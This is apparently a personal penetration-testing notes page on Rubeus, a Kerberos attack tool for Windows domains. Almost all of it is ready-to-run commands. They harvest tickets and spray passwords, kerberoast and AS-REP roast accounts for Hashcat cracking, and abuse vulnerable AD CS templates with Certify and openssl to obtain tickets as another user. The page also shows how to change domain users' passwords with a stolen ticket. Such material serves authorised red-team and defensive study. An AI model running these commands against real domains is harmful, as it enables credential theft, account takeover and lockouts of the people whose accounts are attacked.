2 min read

Rubeus is a Windows-only post-exploitation tool for attacking Kerberos. No compiled binaries are available (either through the GitHub repo or Kali Linux’s windows-binaries package).

Important

To use Rebueus you need to already be on the domain you are attacking, or alternately need to have mapped the domain controller (which normally hosts the KDC) IP address properly in C:\Windows\System32\drivers\etc\hosts.

Harvest Kerberos tickets

# Harvest ticket granting tickets observed by the current machine.
# Probably works best when run on a domain controller.
#
Rubeus.exe harvest /interval:30

Password spraying

# Spray the specified password across all known users and generate a
# ticket giving ticket for successful authentications. (Can trigger
# account lockouts!)
#
Rubeus.exe brute /password:ThePasswordToSpray /noticket

Kerberoasting

Kerberoasting with Rubeus

# Extract password hashes for all known kerberoastable accounts using
# Rubeus.
#
Rubeus.exe kerberoast

The password hashes output here can then be cracked with Hashcat (use the 13100 hash mode).

Link to original

AS-REP roasting

AS-REP roasting With Rubeus

# AS-REP roasting with Rubeus.
#
Rubeus.exe asreproast

To use Hashcat to crack the hashes obtained in this fashion, first insert 23$ after the leading $kerb5asrep$ (so $kerb5asrep$$kerb5asrep$23$) and then use mode 18200.

Link to original

Use a certificate to request a ticket

Start by using Certify.exe on the target:

# Identify vulnerable AD CS templates.
#
Certify.exe find /vulnerable
 
# Request a CSR using a vulnerable template.
#
Certify.exe request /ca:$AD_CS_CA /template:$TEMPLATE_NAME `
                    $OTHER_OPTIONS_AS_APPROPRIATE_TO_THE_ATTACK

Take the output of the last command above and paste it into a $CERTIFICATE_PEM_FILE on the attacking box. Then:

openssl pkcs12 -in $CERTIFICATE_PEM_FILE -keyex \
               -CSP "Microsoft Enhanced Cryptographic Provider v1.0" \
               -export -out $CERTIFICATE_PFX_FILE

Move $CERTIFICATE_PFX_FILE back to the target, and then use Rubeus to seal the deal:

# Request a ticket using a certificate from AD CS.
#
Rubeus.exe asktgt /user:$USER `
                  /enctype:aes256 `
                  /certificate:$CERTIFICATE_PFX_FILE `
                  /password:$CERTIFICATE_FILE_PASSWORD `
                  /outfile:$TICKET_FILE `
                  /domain:$DOMAIN `
                  /dc:$DC_IP_ADDRESS

This is very useful if we’ve used an AD CS misconfiguration as described by SpectreOps’ “Certified Pre-Owned” research to forge a certificate that’s valid for another user.

Change a user’s password

# We can use Rubeus to change the password for domain users so long as
# our ticket is for a user with permission to do so (generally the user
# themselves or a domain admin.
#
Rubeus.exe changepw /ticket:$TICKET_FILE `
                    /new:$NEW_PASSWORD `
                    /dc:$DC_IP_ADDRESS `
                    /targetuser:$DOMAIN\$USER

Backlinks

Graph View